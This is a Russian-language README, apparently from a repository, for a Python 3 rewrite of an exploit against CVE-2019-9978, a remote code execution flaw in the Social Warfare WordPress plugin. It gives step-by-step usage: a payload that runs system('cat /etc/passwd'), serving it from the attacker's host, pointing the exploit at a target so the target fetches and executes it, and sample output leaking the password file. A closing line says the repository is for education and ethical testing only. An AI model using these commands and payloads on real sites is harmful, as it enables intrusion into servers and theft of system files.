
Уязвимость удаленного выполнения кода (RCE) в плагине Social Warfare для WordPress, затрагивающая версии ниже 3.5.3.
Уязвимость удаленного выполнения кода (RCE) в плагине Social Warfare для WordPress, затрагивающая все версии ниже 3.5.3.
Оригинальный публичный эксплойт был написан на устаревшей версии Python и больше не работает должным образом в современных средах.
Я переписал эксплойт, чтобы он был полностью совместим с Python 3, что упрощает его использование, понимание и интеграцию в современные инструменты.
Создайте файл с именем payload.txt со следующим содержимым:
<pre>system('cat /etc/passwd')</pre>
Используйте Python для обслуживания вашей полезной нагрузки:
python3 -m http.server 8000
Это сделает ваш payload.txt доступным по адресу:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
Если цель уязвима, вы получите вывод, похожий на:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Если эта нагрузка сделала ваш день, звездочка ⭐ сделает мой.
< 3.5.3⚠️ Отказ от ответственности: Этот репозиторий предназначен только для образовательного и этического тестирования.
Несанкционированное использование этого эксплойта против систем, которые вам не принадлежат, строго запрещено.